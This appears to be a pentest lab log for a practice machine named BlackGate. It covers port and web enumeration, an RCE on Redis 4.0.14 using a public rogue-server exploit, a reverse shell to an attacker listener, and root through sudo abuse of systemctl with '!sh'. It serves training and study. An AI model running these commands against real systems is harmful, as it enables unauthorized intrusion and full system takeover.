BlackGate

🧪 Pentest Log: {{date:2025-08-12}}

🔍 Target Information

Machine Name: BlackGate
IP Address: 192.168.199.176
Operating System: Linux

ip=192.168.199.176

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 6379

Redis key-value store 4.0.14

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Google "Redis key-value store 4.0.14 exploit", found

https://github.com/n0b0dyCN/redis-rogue-server

💣 Exploitation

📌 Vulnerability Summary

Service / Port: 6379
Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

Manual
Public Exploit
Custom Script

Tool / Script Used:

https://github.com/n0b0dyCN/redis-rogue-server

python3 redis-rogue-server.py --rhost $ip --lhost 192.168.45.163

python3 /home/kali/Documents/oscp/penelope/penelope.py -p 6379

ClimbingParrotKickingDonkey321

🧬 Privilege Escalation

👤 Current Access

User: prudence
Groups: prudence
Shell Type: reverse shell

🔍 Enumeration

Sudo:

sudo -l

found

User prudence may run the following commands on blackgate:
    (root) NOPASSWD: /usr/local/bin/redis-status

strings /usr/local/bin/redis-status

found

Authorization Key: 
ClimbingParrotKickingDonkey321
/usr/bin/systemctl status redis

🔓 Privilege Escalation Exploit

📌 Exploit Summary

Technique Used: Sudo Abuse
Target Binary/Service: Systemctl
Reference / Source: GTFOBins

🔧 Exploit Steps

Smash to root

sudo /usr/bin/systemctl status redis
ClimbingParrotKickingDonkey321

!sh